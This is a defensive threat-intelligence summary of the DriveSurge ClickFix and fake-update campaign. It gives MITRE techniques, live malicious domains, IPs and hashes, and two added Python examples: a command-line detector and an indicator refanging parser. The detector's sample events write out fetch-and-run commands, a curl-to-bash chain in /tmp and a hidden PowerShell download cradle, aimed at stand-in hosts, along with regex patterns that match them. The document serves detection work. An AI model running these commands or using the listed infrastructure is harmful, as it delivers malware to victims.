Meet DriveSurge: A New Threat Actor Using ClickFix and Fake Update Drive-By Attacks in Thousands of Compromised Sites

Silent Push identified DriveSurge, a specialized Initial Access Broker using zTDS to hijack thousands of legitimate websites and redirect victims to ClickFix and FakeUpdates delivery chains at scale. The investigation also uncovered related infrastructure for ad distribution and macOS payload staging, including domains, IPs, and server fingerprints tied to DriveSurge’s broader campaign.

Key points

  • DriveSurge was identified as the primary force behind a large surge in ClickFix and FakeUpdates campaigns.
  • The actor appears to operate as an Initial Access Broker using a Pay-Per-Install model to monetize infections and sell victim leads downstream.
  • DriveSurge compromised thousands of websites and used zTDS to redirect visitors from trusted sites to malicious destinations.
  • Silent Push developed eight fingerprints to map DriveSurge infrastructure, including file patterns, WHOIS pivots, and server configuration indicators.
  • A compromised site, jclforwarding[.]com, was observed serving fake browser update lures and ClickFix instructions.
  • The research also uncovered ADS infrastructure at banerpanel[.]live, plus a payload and development server at testio[.]ecartdev[.]com.
  • Additional analysis revealed obfuscated macOS malware delivery, clipboard hijacking, and C2 infrastructure tied to payload servers.

MITRE Techniques

  • [T1189] Drive-by Compromise – Victims were redirected from legitimate websites through injected code and zTDS to malicious update pages and payloads (‘hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware’).
  • [T1059.001] PowerShell – ClickFix instructed users to paste a “fix” into a terminal or PowerShell window to run malicious code (‘copy and paste a “fix” into their terminal or PowerShell window’).
  • [T1059.004] Unix Shell – The macOS payload staged execution through shell commands including curl and bash (‘cd /tmp && curl -kfsSL … && bash … && rm -f …’).
  • [T1027] Obfuscated Files or Information – The actors used Base64, string concatenation, and filename obfuscation to hide malicious logic (‘obfuscation techniques, such as atob() decoding’ and ‘wrapped in a base64 string’).
  • [T1105] Ingress Tool Transfer – Malicious scripts and payloads were downloaded from remote servers before execution (‘download the ZIP file’ and ‘curl -kfsSL’).
  • [T1204.001] User Execution: Malicious Link – Victims were tricked into clicking fake update buttons or pasting commands that executed malware (‘Clicking the update button triggered the download’ and ‘paste (⌘ + V)’).
  • [T1115] Clipboard Data – The script silently replaced clipboard contents with a malicious command (‘silently replaces the user’s clipboard content with the malicious command’).
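The two execution techniques above (a pasted PowerShell one-liner, and the macOS ‘cd /tmp && curl -kfsSL … && bash … && rm -f …’ chain) leave a recognisable shape in process-creation telemetry. The following is an added detection example written for this summary; it is not Silent Push code and not a rule from the report. The sample events, the `.invalid` URLs, the rule weights and the threshold are all constructed assumptions; the patterns themselves only encode what the MITRE entries above describe. The heuristic "interactive parent launching a remote fetch" generalises the ClickFix paste step beyond the specific commands quoted on the page.

```python
import re

# Constructed sample process-creation events (hypothetical; not from the report).
# Event 0 mirrors the macOS chain quoted above; event 1 mirrors a pasted PowerShell "fix";
# events 2-4 are benign or borderline traffic used to check for false positives.
SAMPLE_EVENTS = [
    {"host": "mac-01", "parent": "Terminal",
     "cmdline": "sh -c 'cd /tmp && curl -kfsSL https://update.example.invalid/u.sh -o u.sh && bash u.sh && rm -f u.sh'"},
    {"host": "win-07", "parent": "explorer.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex ((New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/content.ps1'))\""},
    {"host": "mac-02", "parent": "Terminal",
     "cmdline": "cd /tmp && ls -la"},
    {"host": "win-03", "parent": "devenv.exe",
     "cmdline": "powershell.exe -NoProfile -File .\\build.ps1"},
    {"host": "lin-05", "parent": "bash",
     "cmdline": "curl -fsSL https://pkgs.example.invalid/install.sh | sudo bash"},
]

# (name, weight, pattern). Weights and names are a constructed scoring scheme.
RULES = [
    # The exact chain quoted in the report: cd /tmp, fetch, run, delete.
    ("tmp_curl_bash_rm_chain", 3,
     re.compile(r"cd\s+/tmp\s*&&.*\bcurl\b.*&&\s*(?:ba)?sh\b.*&&\s*rm\s+-f", re.I)),
    # curl with -k (TLS verification disabled), as in -kfsSL.
    ("curl_insecure_tls", 1,
     re.compile(r"\bcurl\b\s+-[A-Za-z]*k", re.I)),
    # Remote script fed straight into a shell, by pipe or by && chaining.
    ("remote_script_to_shell", 2,
     re.compile(r"\bcurl\b.*\|\s*(?:sudo\s+)?(?:ba)?sh\b|\bcurl\b.*&&\s*(?:ba)?sh\b", re.I)),
    # PowerShell launched with a hidden window.
    ("powershell_hidden_window", 1,
     re.compile(r"powershell(?:\.exe)?\b.*\s-w(?:indowstyle)?\s+hidden", re.I)),
    # Execution policy bypass (-ep bypass / -ExecutionPolicy Bypass).
    ("powershell_policy_bypass", 1,
     re.compile(r"\s-e(?:xecutionpolicy|p)?\s+bypass", re.I)),
    # Download cradle: iex / Invoke-Expression over fetched content.
    ("powershell_download_cradle", 2,
     re.compile(r"(?:\biex\b|invoke-expression).*(?:downloadstring|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b)", re.I)),
]

# Parents that imply a human typed or pasted the command (ClickFix's delivery step).
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "terminal.app", "iterm2"}
THRESHOLD = 4  # constructed; tune against your own telemetry


def score_event(event):
    """Return (score, [rule names hit]) for one process-creation event."""
    cmd = event["cmdline"]
    score, hits = 0, []
    for name, weight, pattern in RULES:
        if pattern.search(cmd):
            score += weight
            hits.append(name)
    # Interactive parent + a URL in the command line: the pasted "fix" pattern.
    if event.get("parent", "").lower() in INTERACTIVE_PARENTS and re.search(r"https?://", cmd, re.I):
        score += 2
        hits.append("user_launched_remote_fetch")
    return score, hits


def flag_events(events, threshold=THRESHOLD):
    """Return [(host, score, hits)] for events at or above the threshold."""
    flagged = []
    for event in events:
        score, hits = score_event(event)
        if score >= threshold:
            flagged.append((event["host"], score, hits))
    return flagged


if __name__ == "__main__":
    for host, score, hits in flag_events(SAMPLE_EVENTS):
        print(f"{host}: score={score} rules={','.join(hits)}")
```

With the constructed weights, the plain `curl | sudo bash` installer on `lin-05` scores 2 and stays below the threshold, while the two ClickFix-shaped events score 8 and 6; the point of the weighting is that no single pattern (hidden window, `-k`, a download cradle) is conclusive on its own, but the combination with an interactive parent is.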

Indicators of Compromise

  • [Domains] malicious update, TDS, and ad infrastructure – ztds[.]info, check[.]first-node[.]rocks, cptoptious[.]com, banerpanel[.]live
  • [Domains] compromised or suspicious websites and loaders – jclforwarding[.]com, testio[.]ecartdev[.]com, beacontrace[.]bond, webgleam[.]info
  • [IP addresses] ClickFix and payload/C2 activity – 91.92.240[.]127, 46.226.166[.]57, and 147.45.42[.]205:8133
  • [IP addresses] older payload hosting – 147.45.42[.]200, 147.45.42[.]205
  • [File names] payloads and injected scripts – Browser Update[.]exe, t.js, jsrepo, content.ps1
  • [Hashes] downloaded ZIP and payload files – ZIP SHA256 90aecb370dfb1a99a1f7de0a9c6842ab1b664521fddea16b0ec9a91f322646fc, payload SHA256 7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d, and 2 more hashes
  • [Emails] registration pivots used by the actor – thiagorivera197151[@]ycyfugihih[.]cfd, and one additional actor email referenced in WHOIS pivots
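The indicator list above is defanged with `[.]` and `[@]` and mixes labels ("ZIP SHA256 …", "and …") into the values, which is what a feed consumer has to undo before loading the IoCs into a blocklist or a SIEM watchlist. The following parser is an added example for this summary, not Silent Push tooling; its input is the indicator text copied from the list above, and the type names, the filename-extension list and the `Indicator` structure are assumptions of this example. It goes slightly beyond the page by also handling `hxxp` defanging and rejecting out-of-range IPv4 octets.

```python
import re
from typing import NamedTuple


class Indicator(NamedTuple):
    kind: str   # "domain", "ipv4", "ipv4_port", "sha256", "email", "filename" or "unknown"
    value: str  # refanged value


# Indicator text copied from the IoC list above (labels and defanging left as published).
REPORT_LINES = [
    "ztds[.]info, check[.]first-node[.]rocks, cptoptious[.]com, banerpanel[.]live",
    "jclforwarding[.]com, testio[.]ecartdev[.]com, beacontrace[.]bond, webgleam[.]info",
    "91.92.240[.]127, 46.226.166[.]57, and 147.45.42.205:8133",
    "147.45.42.200, 147.45.42.205",
    "Browser Update[.]exe, t.js, jsrepo, content.ps1",
    "ZIP SHA256 90aecb370dfb1a99a1f7de0a9c6842ab1b664521fddea16b0ec9a91f322646fc, "
    "payload SHA256 7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d",
    "thiagorivera197151[@]ycyfugihih[.]cfd",
]

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# Order matters: filename is tested before domain so "t.js" is not read as a host name.
PATTERNS = [
    ("sha256", re.compile(r"^[0-9a-f]{64}$", re.I)),
    ("email", re.compile(r"^[^@\s]+@[^@\s]+\.[a-z]{2,}$", re.I)),
    ("ipv4_port", re.compile(rf"^{IPV4}:\d{{1,5}}$")),
    ("ipv4", re.compile(rf"^{IPV4}$")),
    ("filename", re.compile(r"^.+\.(?:exe|js|ps1|zip|dmg|sh|bat|vbs|hta|msi)$", re.I)),
    ("domain", re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)),
]


def refang(token):
    """Undo the common defanging conventions; idempotent on already-clean input."""
    return token.replace("[.]", ".").replace("[@]", "@").replace("hxxp", "http")


def _valid_octets(ip):
    return all(0 <= int(octet) <= 255 for octet in ip.split("."))


def classify(token):
    """Refang one token and assign it an indicator type."""
    value = refang(token.strip())
    for kind, pattern in PATTERNS:
        if pattern.match(value):
            if kind in ("ipv4", "ipv4_port") and not _valid_octets(value.split(":")[0]):
                continue
            return Indicator(kind, value)
    return Indicator("unknown", value)


def parse_lines(lines):
    """Split comma-separated indicator text, drop labels, and return unique indicators."""
    seen, out = set(), []
    for line in lines:
        for chunk in line.split(","):
            chunk = re.sub(r"^\s*and\s+", "", chunk).strip()
            if not chunk:
                continue
            indicator = classify(chunk)
            # A label such as "ZIP SHA256 <hash>" fails as a whole; retry on the last word.
            if indicator.kind == "unknown" and " " in chunk:
                indicator = classify(chunk.split()[-1])
            if indicator not in seen:
                seen.add(indicator)
                out.append(indicator)
    return out


def summarize(indicators):
    """Count indicators per type."""
    counts = {}
    for indicator in indicators:
        counts[indicator.kind] = counts.get(indicator.kind, 0) + 1
    return counts


if __name__ == "__main__":
    parsed = parse_lines(REPORT_LINES)
    for indicator in parsed:
        print(f"{indicator.kind:10} {indicator.value}")
    print(summarize(parsed))
```

`jsrepo` has no extension and no dot, so it lands in the `unknown` bucket rather than being silently dropped; that bucket is worth reviewing by hand before the list is loaded anywhere. Note that a refanged `147.45.42.205` and the `147.45.42.205:8133` endpoint are kept as two distinct indicators, because a host blocklist and a network-flow rule consume them differently.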


Read more: https://www.silentpush.com/blog/drivesurge/?utm_source=rss&utm_medium=rss&utm_campaign=drivesurge